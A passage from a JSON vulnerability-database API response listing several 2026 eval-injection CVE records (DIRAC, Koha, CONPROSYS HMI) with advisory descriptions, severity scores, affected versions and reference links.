record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-M4M7-4CW8-62J6"}]},{"id":"cf809681-d5ea-40d9-b023-08513626f55a","slug":"cve-2026-45579","externalId":"CVE-2026-45579","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-45579 — DIRAC is an interware, meaning a software framework for distributed computing.","description":"DIRAC is an interware, meaning a software framework for distributed computing. Prior to versions 8.0.79, 9.0.22, and 9.1.10, the RequestManagementSystem/Service/ReqManagerHandler.py export_getRequestCountersWeb function passes an authenticated caller-controlled groupingAttribute to RequestManagementSystem/DB/RequestDB.py getRequestCountersWeb. An unrecognized value is resolved against the Request object and evaluated as Python code, allowing a crafted dunder attribute expression to reach operating-system functions and execute commands as the account running the DIRAC services. Successful exploitation can expose dirac.cfg, database passwords, stored proxies, and tokens, fully compromise the DIRAC system, and allow alteration of local log evidence. This issue is fixed in versions 8.0.79, 9.0.22, and 9.1.10.","cveId":"CVE-2026-45579","cvssScore":9.9,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","severity":"critical","vendor":"PyPI","product":"dirac","affectedVersions":["pkg:pypi/dirac >= 6, < 8.0.79","pkg:pypi/dirac >= 8.1.0a1, < 9.0.22","pkg:pypi/dirac >= 9.1.0, < 9.1.10","pkg:pypi/dirac >= 6, < 8.0.79 || >= 8.1.0a1, < 9.0.22 || >= 9.1.0, < 9.1.10"],"cwes":["CWE-95"],"tags":["osv","osv:ghsa-9jpv-c7p4-997x","ecosystem:pypi","osv:pysec-2026-3462","nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-9jpv-c7p4-997x","type":"advisory","title":"OSV GHSA-9jpv-c7p4-997x"},{"url":"https://github.com/DIRACGrid/DIRAC/security/advisories/GHSA-9jpv-c7p4-997x","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC","type":"vendor","title":"OSV package"},{"url":"https://pypi.org/project/DIRAC/8.0.79","type":"other","title":"OSV web"},{"url":"https://pypi.org/project/DIRAC/9.0.22","type":"other","title":"OSV web"},{"url":"https://pypi.org/project/DIRAC/9.1.10","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/PYSEC-2026-3462","type":"advisory","title":"OSV PYSEC-2026-3462"},{"url":"https://pypi.org/project/dirac","type":"vendor","title":"OSV package"},{"url":"https://github.com/advisories/GHSA-9jpv-c7p4-997x","type":"advisory","title":"OSV advisory"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45579","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/DIRACGrid/DIRAC/commit/8ec11072f48103d94e8b7cca831e2c7ce304d6c7","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/commit/99f1af88b525e69a77f204aebf7d8df3b6056142","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/commit/a6f75ce5d369254d46ca6f1d39e3f384366fa396","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/releases/tag/v8.0.79","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/releases/tag/v9.0.22","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/releases/tag/v9.1.10","type":"advisory","title":"security-advisories@github.com"}],"epssScore":0.00864,"epssPercentile":0.57365,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-15T18:17:21.427Z","addedAt":"2026-07-29T20:52:09.921Z","updatedAt":"2026-09-30T19:50:41.564Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45579","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-45579","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-9JPV-C7P4-997X"}]},{"id":"814a3cf4-f2f4-44e0-b135-f2172ddf3d31","slug":"cve-2026-19780","externalId":"CVE-2026-19780","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-19780 — Koha Eval Code Injection Remote Code Execution Vulnerability.","description":"Koha Eval Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Koha. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the web service, which listens on TCP port 8081 by default. The issue results from the lack of proper validation of a user-supplied string before passing it to the eval function. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-29165.","cveId":"CVE-2026-19780","cvssScore":8.8,"cvssVector":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-95"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.zerodayinitiative.com/advisories/ZDI-26-616/","type":"advisory","title":"zdi-disclosures@trendmicro.com"}],"epssScore":0.00584,"epssPercentile":0.4622,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-15T17:17:11.383Z","addedAt":"2026-09-15T17:50:37.449Z","updatedAt":"2026-09-22T19:50:38.998Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-19780","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-19780","note":"authoritative record"}]},{"id":"5f1b88ee-eece-4baf-b6a3-7fd4516351b5","slug":"cve-2026-82789","externalId":"CVE-2026-82789","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-82789 — An improper neutralization of directives in dynamically evaluated code ('Eval Injection') issue exists in CONPROSYS HMI System(CHS).","description":"An improper neutralization of directives in dynamically evaluated code ('Eval Injection') issue exists in CONPROSYS HMI System(CHS). If exploited, arbitrary code may be executed by an attacker who can log in to the product.","cveId":"CVE-2026-82789","cvssScore":8.7,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-95"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://jvn.jp/en/vu/JVNVU96551518/","type":"advisory","title":"vultures@jpcert.or.jp"},{"url":"https://www.contec.com/api/downloadlogger?download=/-/media/Contec/support/security-info/2026/contec_security_cps_26091000_en.pdf","type":"advisory","title":"vultures@jpcert.or.jp"}],"epssScore":0.00549,"epssPercentile":0.44213,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-14T07:17:20.920Z","addedAt":"2026-09-14T07:50:35.129Z","updatedAt":"2026-09-16T19:50:38.642Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-82789","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-82789","note":"authoritative record"}]}],"pagination":{"page":1,"limit":20,"total":85,"totalPages":5,"hasNext":true,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-08T23:43:43.062Z","durationMs":32,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":[],"cwe":["CWE-95"],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}